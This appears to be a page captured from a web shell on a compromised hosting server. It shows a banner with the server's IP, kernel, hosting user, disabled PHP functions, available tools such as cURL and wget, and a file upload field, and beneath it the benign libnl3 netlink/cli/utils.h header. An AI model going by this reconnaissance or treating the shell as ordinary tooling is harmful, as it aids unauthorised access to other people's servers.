. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Server IP : 104.21.41.133 / Your IP :
3.17.185.204 [
Web Server : LiteSpeed System : Linux altar63.supremepanel63.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64 User : abranoticias ( 1103) PHP Version : 8.0.30 Disable Function : NONE Domains : 1 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /proc/self/root/usr/include/libnl3/netlink/cli/ |
Upload File : |
/* SPDX-License-Identifier: LGPL-2.1-only */ /* * Copyright (c) 2003-2009 Thomas Graf <tgraf@suug.ch> */ #ifndef __NETLINK_CLI_UTILS_H_ #define __NETLINK_CLI_UTILS_H_ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <stdarg.h> #include <limits.h> #include <inttypes.h> #include <errno.h> #include <stdint.h> #include <ctype.h> #include <getopt.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/select.h> #include <netlink/netlink.h> #include <netlink/utils.h> #include <netlink/addr.h> #include <netlink/list.h> #include <netlink/route/rtnl.h> #include <netlink/route/link.h> #include <netlink/route/addr.h> #include <netlink/route/neighbour.h> #include <netlink/route/neightbl.h> #include <netlink/route/route.h> #include <netlink/route/rule.h> #include <netlink/route/qdisc.h> #include <netlink/route/class.h> #include <netlink/route/classifier.h> #include <netlink/route/cls/ematch.h> #include <netlink/fib_lookup/lookup.h> #include <netlink/fib_lookup/request.h> #include <netlink/genl/genl.h> #include <netlink/genl/ctrl.h> #include <netlink/genl/mngt.h> #include <netlink/netfilter/ct.h> #ifdef __cplusplus extern "C" { #endif #ifndef __init #define __init __attribute__((constructor)) #endif #ifndef __exit #define __exit __attribute__((destructor)) #endif extern uint32_t nl_cli_parse_u32(const char *); extern void nl_cli_print_version(void) __attribute__((noreturn)); extern void nl_cli_fatal(int, const char *, ...) __attribute__((noreturn)); extern struct nl_addr * nl_cli_addr_parse(const char *, int); extern int nl_cli_connect(struct nl_sock *, int); extern struct nl_sock * nl_cli_alloc_socket(void); extern int nl_cli_parse_dumptype(const char *); extern int nl_cli_confirm(struct nl_object *, struct nl_dump_params *, int); extern struct nl_cache *nl_cli_alloc_cache(struct nl_sock *, const char *, int (*ac)(struct nl_sock *, struct nl_cache **)); extern struct nl_cache *nl_cli_alloc_cache_flags(struct nl_sock *, const char *, unsigned int flags, int (*ac)(struct nl_sock *, struct nl_cache **, unsigned int)); extern void nl_cli_load_module(const char *, const char *); #ifdef __cplusplus } #endif #endif